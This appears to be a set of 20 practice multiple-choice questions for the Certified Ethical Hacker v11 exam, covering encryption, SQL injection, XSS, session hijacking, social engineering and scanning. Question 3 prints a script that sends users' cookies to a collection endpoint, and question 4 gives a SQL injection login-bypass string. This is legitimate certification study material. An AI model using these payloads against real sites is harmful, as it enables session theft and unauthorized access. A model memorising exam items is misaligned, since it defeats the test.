312-50v11 : Certified Ethical Hacker v11 Exam : Part 10

312-50v11 : Certified Ethical Hacker v11 Exam : Part 10

1. This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?

   • HMAC encryption algorithm
   • Twofish encryption algorithm
   • IDEA
   • Blowfish encryption algorithm

2. Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs.

   Which two SQL injection types would give her the results she is looking for?

   • Out of band and boolean-based
   • Union-based and error-based
   • Time-based and union-based
   • Time-based and boolean-based

3. Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:

   <script>
   document.write(‘<img.src=“https://localhost/submitcookie.php? cookie =’+ escape(document.cookie) +”’ />);
   </script>

   What issue occurred for the users who clicked on the image?

   • This php file silently executes the code and grabs the user’s session cookie and session ID.
   • The code redirects the user to another site.
   • The code injects a new cookie to the browser.
   • The code is a virus that is attempting to gather the user’s username and password.

4. Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials:

   Username: attack’ or 1=1 –
   Password: 123456

   Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?

   • select * from Users where UserName = ‘attack’ ’ or 1=1 — and UserPassword = ‘123456’
   • select * from Users where UserName = ‘attack’ or 1=1 — and UserPassword = ‘123456’
   • select * from Users where UserName = ‘attack or 1=1 — and UserPassword = ‘123456’
   • select * from Users where UserName = ‘attack’ or 1=1 –’ and UserPassword = ‘123456’

5. A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer.

   What tests would you perform to determine whether his computer is infected?

   • Upload the file to VirusTotal.
   • You do not check; rather, you immediately restore a previous snapshot of the operating system.
   • Use ExifTool and check for malicious content.
   • Use netstat and check for outgoing connections to strange IP addresses or domains.

6. An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?

   • Vishing
   • Phishing
   • DDoS
   • Spoofing

7. A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete.

   Which attack is being described here?

   • Desynchronization
   • Slowloris attack
   • Session splicing
   • Phlashing

8. Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney’s account.

   What is the attack performed by Boney in the above scenario?

   • Forbidden attack
   • CRIME attack
   • Session donation attack
   • Session fixation attack

9. Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.

   What is the type of web-service API mentioned in the above scenario?

   • RESTful API
   • JSON-RPC
   • SOAP API
   • REST API

10. Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as “’or ‘1’=‘1’” in any basic injection statement such as “or 1=1.”

    Identify the evasion technique used by Daniel in the above scenario.

    • Char encoding
    • IP fragmentation
    • Variation
    • Null byte

11. Jane, an ethical hacker, is testing a target organization’s web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website’s directories and gain valuable information.

    What is the attack technique employed by Jane in the above scenario?

    • Session hijacking
    • Website mirroring
    • Website defacement
    • Web cache poisoning

12. Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company.

    What is the social engineering technique Steve employed in the above scenario?

    • Baiting
    • Piggybacking
    • Diversion theft
    • Honey trap

13. Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature.

    • Bryan’s public key; Bryan’s public key
    • Alice’s public key; Alice’s public key
    • Bryan’s private key; Alice’s public key
    • Bryan’s public key; Alice’s public key

14. Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob’s connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob.

    What is the type of attack performed by Samuel in the above scenario?

    • TCP/IP hijacking
    • Blind hijacking
    • UDP hijacking
    • Forbidden attack

15. If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?

    • It is a non-stateful firewall.
    • There is no firewall in place.
    • It is a stateful firewall.
    • This event does not tell you anything about the firewall.

16. Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.

    What is the APT lifecycle phase that Harry is currently executing?

    • Initial intrusion
    • Persistence
    • Cleanup
    • Preparation

17. In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?

    • 4.0-6.0
    • 3.9-6.9
    • 3.0-6.9
    • 4.0-6.9

18. While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt’s bank account has been accessed, and the password has been changed.

    What most likely happened?

    • Matt inadvertently provided the answers to his security questions when responding to the post.
    • Matt inadvertently provided his password when responding to the post.
    • Matt’s computer was infected with a keylogger.
    • Matt’s bank-account login information was brute forced.

19. Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls.

    On which of the following ports should Robin run the NSTX tool?

    • Port 50
    • Port 23
    • Port 53
    • Port 80

20. What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?

    • AndroidManifest.xml
    • classes.dex
    • APK.info
    • resources.asrc